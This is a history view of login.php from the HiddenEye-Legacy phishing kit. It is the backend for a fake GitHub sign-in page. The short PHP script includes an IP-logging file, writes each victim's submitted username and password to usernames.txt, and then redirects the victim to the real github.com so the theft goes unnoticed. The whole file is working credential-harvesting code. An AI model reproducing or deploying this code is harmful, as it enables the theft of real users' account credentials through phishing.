HiddenEye-Legacy/WebPages/GitHub/login.php

7 lines
198 B
PHP
Raw Normal View History

2018-03-26 22:24:30 +08:00
<?php
2018-06-07 17:16:53 +08:00
include 'ip.php';
2018-06-09 10:39:03 +08:00
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://github.com');
2018-03-26 22:24:30 +08:00
exit();